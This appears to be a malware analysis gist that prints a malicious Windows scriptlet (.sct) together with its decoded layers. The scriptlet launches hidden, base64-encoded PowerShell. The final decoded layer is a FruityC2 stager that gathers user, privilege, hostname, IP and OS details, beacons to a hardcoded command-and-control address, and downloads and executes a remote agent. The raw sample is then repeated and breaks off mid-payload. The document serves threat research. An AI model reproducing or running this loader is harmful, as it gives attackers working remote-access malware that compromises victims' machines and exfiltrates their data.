JohnLaTwC/606b4bd217b980ce70e4986511fcd00f43e7a89e9e2c6a51ea90d6f3faf33ac9.sct

## 606b4bd217b980ce70e4986511fcd00f43e7a89e9e2c6a51ea90d6f3faf33ac9.sct
## uploaded by @JohnLaTwC
## Sample hash: 606b4bd217b980ce70e4986511fcd00f43e7a89e9e2c6a51ea90d6f3faf33ac9
<?XML version="1.0"?>
<scriptlet>
<registration
	progid="PoC"
	classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<!-- Proof Of Concept - Casey Smith @subTee -->
	<!--  License: BSD3-Clause -->
	<script language="JScript">
		<![CDATA[

			var r = new ActiveXObject("WScript.Shell").Run("powershell.exe -nop -w hidden -e JABkAGEAdABhACAAPQAgACIAdABWAGgAdABUADkAcwA2AEYAUAA0ADgAZgBvAFcAVgBaAFMATABaAG0AdABBAEMAWQAxAHMAUgBIADcAbwBTAFIAaQBXAGcAcQBDAG4AagBTAGwAVgBWAG0AYwBTAGwASABtAG4AYwBPAFMANgBGADAAZgA3ADMAZQAyAHoAbgByAFMAbQB3ADMAWAB0ADEASwA0ADIAMQBQAGoANAB2AGYAcwA2AHIAUABaADcASABnAGEAQQBzAFIAcAAzADQAbgB0ADAAUgB4AHgAZgA0AGwAbgBEADAAdABJAFgAZwBNADgATQBjAFQANQBHAGwAdgBzAHUAUAB5AFUAYwBKADQAZgBkAEEAUAAwAEsARwBVAFMAdQB2AHoAeABnAFgAbQA2AHQASgBFAGwAVQBYAHIAMQBwAHkANQBZAFQAUABxAFgAaABzADcANQBZAHAAZgB1AGQAWQBrAG4AegBQADkAegB2AGQAaQA4ADUAeABtAFQAYQA3AEgAVQAwAEkARABsAFAATgBhAHQAMQBXAGYAdwBmACsAWQB5AEwASQAxAEwAMABnAHcAdgBYAEIATgBoAHEAUQBTADAAWgBqAGMAWQA1AGoAZQBaAEIAaABzACsAawByAGkAOQB1AEUAQwB6AHEAbQBBAFIAYgBrAE8ANAA1AG8AaQBPAFcAaAAyAHoAaQBLAGIAbgBCAHcAQgAwAEsAZgBUAE0ASABuAFoASABYADQAeAAwAEsARABPAFkAYwBUAFgASABJAG0AVwBNAEQAawBLAGQAZQBaADEAcwBuADkAeAB4AGsAQgByAG4ANgBVAHAAQQBwAHUARwBJAHUARwBKAGgAdgBkADQASQBRAGMANwBBAE8AMwBPAGMAWgBSAFEAdABhAEoASgBBADcANAA0ADAAeAA1ADUALwBrAE4AQQBaAHYATwBPAEUAbQBTAGQASQBjADgAdwBaAFkARwArAFUAcABoAE8AUQBDAGIAaAA0AE8AUQB6AFcAOABpAHEAZgA0AFMAOAA0AFIAWQAxAGoAYwBpAG4ARwBQAEEAQQBUAGwAWABKADQAeABQAHMAVQBEAHYARQBsAHUAagBhAFMAYgBBAFoAVwBVAG4AeQBVADcAaABYAG4ASQBhAEIAMwBTAEcASQAvAGUAYQB4AGkARgBiAEoASgAyAFEAeABBAEkAbwBJAEIAUwBrAHQAZQBlAGMAdwAyAC8ATABkAGkALwB3AGwATgBoAG8AaQBiAHAAegBBAFoARQBFAFgATABlAHAAUABiADcAWABrAHgAWQBtAGIAcAAvAFQAcQBhAFcAVgAwAGIARgBsAEQAYgB6ADQAbgBuAEkAVwBUADQARQBmAGgARgAxAEIAZQBDAGsAWgBiAHAAKwBkAHMAUQBYAGgAbABvADAAYwA4AGgATQBaAGkAYgBMAEkAcwBKAC8ATQA1AEcAaAA3AGYAMwB1AGwAQgBCAEEAQQBSAEEAbAA1ADIAZABCADgAWQBZAGcARwAvAC8AZwA0AHQAdAB0AEoATwBuAEcAUABSAGUAUQAxAEYAVgAvAG4ATgBCAEoANgAyAHgAQQBaAHIAWABCAEsAWQA1AG8ASQBqAGcAWABqAGgAcgBaAGUATwBVAGEAYgB2AHIAZQA5AFEAbQAvAFIAMwB0AEUAcAB2AFoAMwBrAFoAMABDAEsAdABKAHUAZQB5AGoAeAByAGYAZgBYAE8ARgBGAG8AbABuADAAaQBuAFgAVQA5AHAAOQArAFkASABDAFEAUQBDADEAWAB1ADcAbwArADYATQBnAEIAbwBBAFcAZgB2AEwAZAB0AHUAKwBCAE8AOABaAC8AQwA5AGEANQA5ADQARwAvAGwAcAB3AG4AeQBUAEMAYQBiAE0ANABKAHIAbwBPAG0AQwBTACsAYgA3AGEANwA1ADUAZABYAGYAYQArAG4AKwBKAHkAQQB6AFcATwBCAEcAaQBBADMASQBaAEYAVQAzADUAbgBkADcANwBmAEMAVQBJAGEAZQA5AFAAWgBKAEgAegBtAG4ATgBDAFIAOQBEAEgARgAyAHEAdABJADAAZwBlAFUATgBLAHoAcQBYAEwAOQBqAHcAUgA0AGUAVABSADMATwBUAFcAVQBTAEYAdABiADMAYwB0AGcAZgAxADQAVABNAEgALwBlADcAMQBaAFAASAA0AEwAMwBxADYAZgBvAHMASABFAHkAcABnAHkANQB3AFQAOQBJAHkAUwBaAEYATgA4ADEAeAArADEAZQB1ADMAVAB3AG0AdgBqAHIASwA2AG0AMgBZAGIAVABrAHAAcQBYAFYAYwB1AGMAWQBUAEYAUgBEAEEARwBuAE0AOQBHAFUAUAAwAGUAMwBSAE4AagA1AFAAcwBFAGYAQwB5AGEAbABaAGgARQBBAFEAMAB3AFcARAB0AE4ASAAwAEcAbgBoAHgAbABCAHkAcgBzAGwATgBPADYASQBRAHQAMQBVAE8AaQBGAGoAMgA4AEYAZwBwAFUATABDADcAUgAzADcATwB3AGYAYwA2ADUAagBVAEoAVgB0AFYAbQB5AHoANQA4AFgAbwByAGIANQBrAFQAbABDAHQAUwBpAGkAcwBTAEMAMABzAGIAQgBSAEoAYQBiAFkAegBMAEcAOAAwAGkAVQBXAEQAYQBsAHAAdABIAGkAUQBqAFIAWgBoAHMAeAArAHAAMwBVAEwAbQA0ADAAYQA5AEEAbgA3ADkAZAAxAHQAeAB1ADQAbwBNAFcAcgBJAGsASgAzAGoAeQBPAHkAMwBlAHQAKwA4AC8AcQBHAHgAegBrAGIASAB5AEMAcAAxAEQAeQBjAG0AMABEADkAcwBjAE0AWQBiACsASgBnAFQANQBjAHEAYwBuAEkAYQBYAHMAUQBRAGgAawBqADUAbQBuAE0AQgBoAFEATQBJAEUAVQBVAGkATgBTAFoASgB4AHYAagBHAHAANQBKAHgAawBIAEMAagBsAGUASwBQADAAWABmAHIAZgB3AFUAegB3AHYAcwBvAEkATgAvAC8AcABuAHUATQBmAGoASwB1AGEAcwBJAHUAYwBWAGgAdwBpAGsAOABvADQAZABqAHcAbwBjAGEAYwBzAEUAUQBiAEsARgBhAHoAUwAwAHEAQgAvAHYAYQBrAGUAWAB6AEgAVwBKAEgAOQBqAG0ASwBwAGUAYgBlAFYALwBWACsAdgBRAGMAZQAxAHEAMgBUAHMAbgBRAHMAeABNAFMANwBkAG0AdQA3AG0AegBvADcAKwByAEYAbQBrADMAMQBRAC8AWgB5AFcAMQBUAGgANgBkAHQAcgBBAHMASwBaAFMAQQBmAEsAVgA4AGMAcwAwAFUAYwBNAFIAegBxAHgATABBAHkASABlAHYAbwBjAHcASQA1AEYARwB1ACsAbgBGAEEAWQBCADkAMABZADAAQgAyAGsAQQBlAGsAOQBCAEUAUgAxAHUAeQBGAGEARAAvAHQAcgBLAEwAegBFAGsAZgBnAGcASQAwADgAbgByADkAZgByADkAbAB5AGoASQBuAFcAMQBuAG4AdwBoAEcAVQBmAFEANgBTAHgAbABnAEYAMABTAHEAMwBOADQAegBTAHgAegBLAHQAYwB1AEkATABuAFMAKwBwAEEARwBkADYAZgByAG4AcABNAHAANAA0ADkAdwBVAG8ASwBuAHgAZgA3AGcAeABmADMAdABvAGkAKwA3AHgAOQBvAEUAegBXAHkAQgBrAGwAcQBlAE4AcABXAGQAcABlAC8AbgBMAEoAUQBaAGwASwAzAFkASgBiAHMAWABMAHkAbgBWAEcAaABSAFcAMwBBAEwAagAxAHAAaABjAHQAVwA2AFoAbABkAFYAMgB4AEcAQQBpAEsARwBXADcAVwBVADUAcgA2AEEAbwBRAEYAcgBKAEMAOQBOAGwAWABOAGEAaABrAHoAcAA1AEMAOQBXAE0AdAB6AGoARwBVAEMAcgBzAEMAYQB1AEoAeQBNAG8AdAB3AFEAQwB6AGoAZwAxAEUAegBIAE0AaQAyAHQAKwBoAHIAeQAvAGQAZwB6AHIAbgBxAG4AZgBtAHQARQArADkAbABqAGgAMwBnAEcATAAzAEcAawBVAFYAVQA4AHAAeQA3AGEAZgB5AFMAdQA3AFAAQQBsAGYAOABYADIAaAB6AFEAOQB1AEYAVgArADUANwBuAEcAdwBIAGYAegBwAC8AdwBiAFMASgA1AHcAdABsADAASABVAHQAbAA2ADcAKwBQAFEAbgBCAEYANgBsAHMAcABxAEkAYgBxAHQAZABUAGEATQB4AEwAZgBRAGcAYQB2ADcAZgBRAEoAdQBiAFAAcQB0AFgAbwAyAG8AMQAzAE0AbwA2AGoAawBEAFAANQA2AGIAUABWAFUALwBiAEgAKwAxADUAQQAvAEoAdABsAFEAVwB3AHEAcwAzAE8AbgBjAGwAVABiADAAbQBSAGUASABhAGUAZgBWAEUAWABDAFMAUgBRAEIALwBHAE0AbgBEAGIAMABhAEEAcQBzAHYAcgBFADMATQB4AG0AcQBHAG4AMwBHAE8AVgBFAEYAcABWAEIAWgBSAG0AOABtAGYANQBRADYATABvAG0ALwB3AGIAcABiAEIAaQB1AGYAaQBOADUAYgA5AFQAbgBOAEoAZgBOAFAAeQAzAEoANgAvAFUAeQB0ADkAYQBuAG0AZABkAG8AcQA2AE0AVgB0AHEAQQAxADkASgBPAHoAVABTAGEARABoAHEAYwBIADMAQwBKAFEAcABaADEAOABOAEYAMQB2ADAAQQBNAGYAawBEAFcAbAAwACsAdQAyADkAagBkAGwAZgBFAG8ASwAzAHMAUAB3ADAAZwA5AFIAVABDAFAAeQBvAGwAegByAHcANwBMADcAOQBEAFQASQBKAGgAZwBQAGoAUgBIAEsAMwBzAGoAdwBmAEoAMgA0AEsAaABwAHkAdABnAHAAcQB5AHkAYQBRADcAbQBEACsAUAAzAFcATgA2AC8AWAAxAEMASwBLAEwAUQBPAGQAagA4AE4ATQBjAGkAVwBTAGkAbgAyAHEANwBBADIARwBRAHgAUABpAGUAWgBiAFgAaAB0AEwAawBVAE8AUwBUAG8ARABDAE4AUQB4AFUASQBTAG8AVwAwAEUANAB1ADkAWABVAHMAeAB5AHcANwBlAHEASgBjAFkAZgBsAEEAaABGAEYASQB2AGMAagBRAHEASABPAG8AMgByAFUAbQA3AHcAdwByAHUATQBFAHYAbQB4AEwAMABxAGMAYwBhAFMAZwByAHAAZgBwAGcASgBoAFIATQBPAGMAOQByAEYARQBTADMAVAA4AGwATQBrAEgASgBUAEsAVwBvADEAdQBwADYAdgBYAEoAZwAzAEMAOQBPAEcAQwBoAEIATABiAFoAYgBQAG4AdABUAHMAZQBWADAANgBZAHUAZgBYADkAUwBIAFoAVwBTAFQAOABOAFMATQBTAGoANQBVAG0AdgBNAEsAUgAzAHYATAB3AFMARABpADEAbwBzADkAcQBjAFAARwA5AG0ATABnADQANABVAEIAVQA0AEIAawAxAE4AZwBVAG8ATABIAFMAZgAyAFIAKwBjAFgAUgBEAGsAMwA5ADYAZwBEADIARQBuADgAbgBqAFcAOQA5AFEAVQBkAE8ALwBrAFoAUwB2AEoAWQA0ADYAZgB0AEkAOQBrADcAaQBDAE0AeQBWAEEAVABwAGwAUQBIADAASwBlAG8ANgArAFUANABLADYARABMAHUAagAzADEAVABTAHAAeABXAG4ARwBHAHkATABJAGIAYQBVAG8AcABuADgAbwA3AHkANgBHAE8AcABwAFkASgBuAGQAawA1AGIAcQBaAHIANwBVAFYAOAA2AGwAdQBpAFkAdQA0AFoAcQAyAHoATwA0AHoAeQAxAGcAKwBFAEUAUgBwAFUARgBjAFMAZgBXAHUAMQBGAFUAUQBFADgANgAzADEAcAA2AE0AQwBBAEsAUAB4ADgAWQB2ADcAKwBZAHYAYgBxAEIALwBJAGYAMABhAE8AZwAvAEcANQAvAHIAbAB1AEsAQQBTAE4AYwAvAGEATABSAGgASABlACsAZQBqAFcAawBaAFYAZQBxAGQARgBGAEgAdwBIAEwASQBiAHIAdQBYAGgALwBzAEgAeQBLADQAYQBjAGsAcgB4AE0ANABuAHQAMwA2AEkAKwBIADIAegAwAFgAQwBoAGYARQBUADAAagBrAEEAQgBDAE8ANgBZAGsAZQBGAGkASgBFAFkAWgBGAEsATQBWAHkASgBFAFMAdgBkADkANQB2ADEAUQBCAHMAMQBnAHMAWABEAHoARgB2ADYARAAxAFEARAAwADAALwBnAFkAPQAiADsAJABkAGEAdABhACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGQAYQB0AGEAKQA7ACQAbQBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABtAHMALgBXAHIAaQB0AGUAKAAkAGQAYQB0AGEALAAgADAALAAgACQAZABhAHQAYQAuAEwAZQBuAGcAdABoACkAOwAkAG0AcwAuAFMAZQBlAGsAKAAwACwAMAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7ACQAcwByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoACQAbQBzACwAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAOwBJAEUAWAAgACQAcwByAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsA");

		]]>
</script>
</registration>
</scriptlet>

## decodes to:

 			var r = new ActiveXObject("WScript.Shell").Run("powershell.exe -nop -w hidden -e $data = "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";$data = [System.Convert]::FromBase64String($data);$ms = New-Object System.IO.MemoryStream;$ms.Write($data, 0, $data.Length);$ms.Seek(0,0) | Out-Null;$sr = New-Object System.IO.StreamReader(New-Object System.IO.Compression.DeflateStream($ms, [System.IO.Compression.CompressionMode]::Decompress));IEX $sr.ReadToEnd();");

## decodes to:

  			var r = new ActiveXObject("WScript.Shell").Run("powershell.exe -nop -w hidden -e $data = "function Invoke-Stager {
    param (
        $r_server = "",
        $r_port = "",
        $r_ssl = "",
        $UA = "FruityC2",
        $SID = "SESSIONID",
        $pg_header = ""
    )
    [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
    [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls;
    [bool]$o_base64 = $false
    [bool]$o_encryption = $false
    [bool]$o_compression = $true
    $UUID = [int][double]::Parse((Get-Date -UFormat %s))
    $s = ([System.Security.Principal.WindowsIdentity]::GetCurrent().Name) | Out-String
    $USER = $s.Trim()
    if(([Environment]::UserName).ToLower() -eq "system"){$s='4'}
    elseif(([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator") -eq $true){$s='3'} # 3=High
    else {$s='2'}
    $LABEL = $s
    $s = (Get-WmiObject Win32_OperatingSystem).CSName | Out-String
    $NAME = $s.Trim()
    $s = (Test-Connection $env:COMPUTERNAME -count 1 | select Ipv4Address) | FT -HideTableHeaders |  Out-String
    $IP = $s.Trim()
    $s = (Get-WmiObject Win32_OperatingSystem).Name.split('|')[0] | Out-String
    $VERSION = $s.Trim()
    $s = (Get-WmiObject Win32_OperatingSystem).OSArchitecture  | Out-String
    $s = $s.Trim()
    $OS_ARCH = $s
    function Get-Data {
        param($path = $script:path_get)
        try{
            $wc = new-object system.net.WebClient
            $wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
            $wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
            $wc.Headers.Add("User-Agent",$UA)
            $wc.Headers.Add("Cookie", "$SID=$TARGET;")
            if ($pg_header -ne "") {
				$hs = $pg_header.split("|")
				foreach ($h in $hs) {
					$i = $h.split(" ")
					if ($PSVersionTable.PSVersion.Major -eq 2 -And $i[0] -Eq "Host" ) {
					} else {
						$wc.Headers.Add($i[0], $i[1])
					}
				}
			}
            $request = "http$($r_ssl)://$($r_server):$($r_port)$($path)"
            $data = $wc.DownloadString($request)
            return $data
        }
        catch [Net.WebException] {
            Write-Host "Get-Data ERROR."
        }
    }
    function deflate($data) {
        $s = $data
        $ms = New-Object System.IO.MemoryStream
        $cs = New-Object System.IO.Compression.DeflateStream($ms, [System.IO.Compression.CompressionMode]::Compress)
        $sw = New-Object System.IO.StreamWriter($cs)
        $sw.Write($s)
        $sw.Close();
        $s = [System.Convert]::ToBase64String($ms.ToArray())
        $s = $s.replace("+","-") # BASE64 URLSAFE
        $s = $s.replace("/","_") # BASE64 URLSAFE
        return $s
    }
    function inflate($data) {
        $data = $data.replace("-","+") # BASE64 URLSAFE
        $data = $data.replace("_","/") # BASE64 URLSAFE
        $data = [System.Convert]::FromBase64String($data)
        $ms = New-Object System.IO.MemoryStream
        $ms.Write($data, 0, $data.Length)
        $ms.Seek(0,0) | Out-Null
        $sr = New-Object System.IO.StreamReader(New-Object System.IO.Compression.DeflateStream($ms, [System.IO.Compression.CompressionMode]::Decompress))
        return $sr.ReadToEnd()
    }
    Function rx_data($data) {
        if ($o_compression -eq $true) { $data = inflate($data) }
        if ($o_encryption -eq $true) { $data = decrypt($data) }
        return $data
    }
    Function tx_data($data) {
        if ($o_encryption -eq $true) { $data = encrypt($data) }
        if ($o_compression -eq $true) { $data = deflate($data) }
        return $data
    }
    function stager($TARGET) {
        $path_stager = -join ((65..90) + (97..122) | Get-Random -Count 30 | % {[char]$_})
        $data = Get-Data -path "/$path_stager"
        Write-Host "STAGER: $data"
        [String]$data = rx_data($data)
        [Array[]]$temp = $data.split("|")
        $stime = [convert]::ToInt32($temp[0],10)
        $jitter = [convert]::ToInt32($temp[1],10)
        $UA = $temp[2]
        $path_get = $temp[3]
        $path_post = $temp[4]
        $post_id = $temp[5]
        $session_id = $temp[6]
        $agent = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($temp[7]))
        Write-Host $agent
        IEX $($agent)
        Invoke-FruityC2 -path_get $path_get -path_post $path_post -jitter $jitter -stime $stime -UA $UA -stager $false -r_server $r_server -r_port $r_port -target $TARGET -post_id $post_id -session_id $session_id -r_ssl $r_ssl -pg_header $pg_header
    }
    $TARGET = tx_data("$UUID|$VERSION|$USER|$LABEL|$NAME|$IP|$OS_ARCH|normal")
    stager($TARGET)
}
clear
Invoke-Stager -r_server "159.89.106.106" -r_port "8080" -UA "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" -r_ssl "s" -pg_header "Accept */*|Host www.amazon.com"";$data = [System.Convert]::FromBase64String($data);$ms = New-Object System.IO.MemoryStream;$ms.Write($data, 0, $data.Length);$ms.Seek(0,0) | Out-Null;$sr = New-Object System.IO.StreamReader(New-Object System.IO.Compression.DeflateStream($ms, [System.IO.Compression.CompressionMode]::Decompress));IEX $sr.ReadToEnd();");
	## uploaded by @JohnLaTwC
	## Sample hash: 606b4bd217b980ce70e4986511fcd00f43e7a89e9e2c6a51ea90d6f3faf33ac9
	<?XML version="1.0"?>
	<scriptlet>
	<registration
	progid="PoC"
	classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<!-- Proof Of Concept - Casey Smith @subTee -->
	<!-- License: BSD3-Clause -->
	<script language="JScript">
	<![CDATA[

	var r = new ActiveXObject("WScript.Shell").Run("powershell.exe -nop -w hidden -e JABkAGEAdABhACAAPQAgACIAdABWAGgAdABUADkAcwA2AEYAUAA0ADgAZgBvAFcAVgBaAFMATABaAG0AdABBAEMAWQAxAHMAUgBIADcAbwBTAFIAaQBXAGcAcQBDAG4AagBTAGwAVgBWAG0AYwBTAGwASABtAG4AYwBPAFMANgBGADAAZgA3ADMAZQAyAHoAbgByAFMAbQB3ADMAWAB0ADEASwA0ADIAMQBQAGoANAB2AGYAcwA2AHIAUABaADcASABnAGEAQQBzAFIAcAAzADQAbgB0ADAAUgB4AHgAZgA0AGwAbgBEADAAdABJAFgAZwBNADgATQBjAFQANQBHAGwAdgBzAHUAUAB5AFUAYwBKADQAZgBkAEEAUAAwAEsARwBVAFMAdQB2AHoAeABnAFgAbQA2AHQASgBFAGwAVQBYAHIAMQBwAHkANQBZAFQAUABxAFgAaABzADcANQBZAHAAZgB1AGQAWQBrAG4AegBQADkAegB2AGQAaQA4ADUAeABtAFQAYQA3AEgAVQAwAEkARABsAFAATgBhAHQAMQBXAGYAdwBmACsAWQB5AEwASQAxAEwAMABnAHcAdgBYAEIATgBoAHEAUQBTADAAWgBqAGMAWQA1AGoAZQBaAEIAaABzACsAawByAGkAOQB1AEUAQwB6AHEAbQBBAFIAYgBrAE8ANAA1AG8AaQBPAFcAaAAyAHoAaQBLAGIAbgBCAHcAQgAwAEsAZgBUAE0ASABuAFoASABYADQAeAAwAEsARABPAFkAYwBUAFgASABJAG0AVwBNAEQAawBLAGQAZQBaADEAcwBuADkAeAB4AGsAQgByAG4ANgBVAHAAQQBwAHUARwBJAHUARwBKAGgAdgBkADQASQBRAGMANwBBAE8AMwBPAGMAWgBSAFEAdABhAEoASgBBADcANAA0ADAAeAA1ADUALwBrAE4AQQBaAHYATwBPAEUAbQBTAGQASQBjADgAdwBaAFkARwArAFUAcABoAE8AUQBDAGIAaAA0AE8AUQB6AFcAOABpAHEAZgA0AFMAOAA0AFIAWQAxAGoAYwBpAG4ARwBQAEEAQQBUAGwAWABKADQAeABQAHMAVQBEAHYARQBsAHUAagBhAFMAYgBBAFoAVwBVAG4AeQBVADcAaABYAG4ASQBhAEIAMwBTAEcASQAvAGUAYQB4AGkARgBiAEoASgAyAFEAeABBAEkAbwBJAEIAUwBrAHQAZQBlAGMAdwAyAC8ATABkAGkALwB3AGwATgBoAG8AaQBiAHAAegBBAFoARQBFAFgATABlAHAAUABiADcAWABrAHgAWQBtAGIAcAAvAFQAcQBhAFcAVgAwAGIARgBsAEQAYgB6ADQAbgBuAEkAVwBUADQARQBmAGgARgAxAEIAZQBDAGsAWgBiAHAAKwBkAHMAUQBYAGgAbABvADAAYwA4AGgATQBaAGkAYgBMAEkAcwBKAC8ATQA1AEcAaAA3AGYAMwB1AGwAQgBCAEEAQQBSAEEAbAA1ADIAZABCADgAWQBZAGcARwAvAC8AZwA0AHQAdAB0AEoATwBuAEcAUABSAGUAUQAxAEYAVgAvAG4ATgBCAEoANgAyAHgAQQBaAHIAWABCAEsAWQA1AG8ASQBqAGcAWABqAGgAcgBaAGUATwBVAGEAYgB2AHIAZQA5AFEAbQAvAFIAMwB0AEUAcAB2AFoAMwBrAFoAMABDAEsAdABKAHUAZQB5AGoAeAByAGYAZgBYAE8ARgBGAG8AbABuADAAaQBuAFgAVQA5AHAAOQArAFkASABDAFEAUQBDADEAWAB1ADcAbwArADYATQBnAEIAbwBBAFcAZgB2AEwAZAB0AHUAKwBCAE8AOABaAC8AQwA5AGEANQA5ADQARwAvAGwAcAB3AG4AeQBUAEMAYQBiAE0ANABKAHIAbwBPAG0AQwBTACsAYgA3AGEANwA1ADUAZABYAGYAYQArAG4AKwBKAHkAQQB6AFcATwBCAEcAaQBBADMASQBaAEYAVQAzADUAbgBkADcANwBmAEMAVQBJAGEAZQA5AFAAWgBKAEgAegBtAG4ATgBDAFIAOQBEAEgARgAyAHEAdABJADAAZwBlAFUATgBLAHoAcQBYAEwAOQBqAHcAUgA0AGUAVABSADMATwBUAFcAVQBTAEYAdABiADMAYwB0AGcAZgAxADQAVABNAEgALwBlADcAMQBaAFAASAA0AEwAMwBxADYAZgBvAHMASABFAHkAcABnAHkANQB3AFQAOQBJAHkAUwBaAEYATgA4ADEAeAArADEAZQB1ADMAVAB3AG0AdgBqAHIASwA2AG0AMgBZAGIAVABrAHAAcQBYAFYAYwB1AGMAWQBUAEYAUgBEAEEARwBuAE0AOQBHAFUAUAAwAGUAMwBSAE4AagA1AFAAcwBFAGYAQwB5AGEAbABaAGgARQBBAFEAMAB3AFcARAB0AE4ASAAwAEcAbgBoAHgAbABCAHkAcgBzAGwATgBPADYASQBRAHQAMQBVAE8AaQBGAGoAMgA4AEYAZwBwAFUATABDADcAUgAzADcATwB3AGYAYwA2ADUAagBVAEoAVgB0AFYAbQB5AHoANQA4AFgAbwByAGIANQBrAFQAbABDAHQAUwBpAGkAcwBTAEMAMABzAGIAQgBSAEoAYQBiAFkAegBMAEcAOAAwAGkAVQBXAEQAYQBsAHAAdABIAGkAUQBqAFIAWgBoAHMAeAArAHAAMwBVAEwAbQA0ADAAYQA5AEEAbgA3ADkAZAAxAHQAeAB1ADQAbwBNAFcAcgBJAGsASgAzAGoAeQBPAHkAMwBlAHQAKwA4AC8AcQBHAHgAe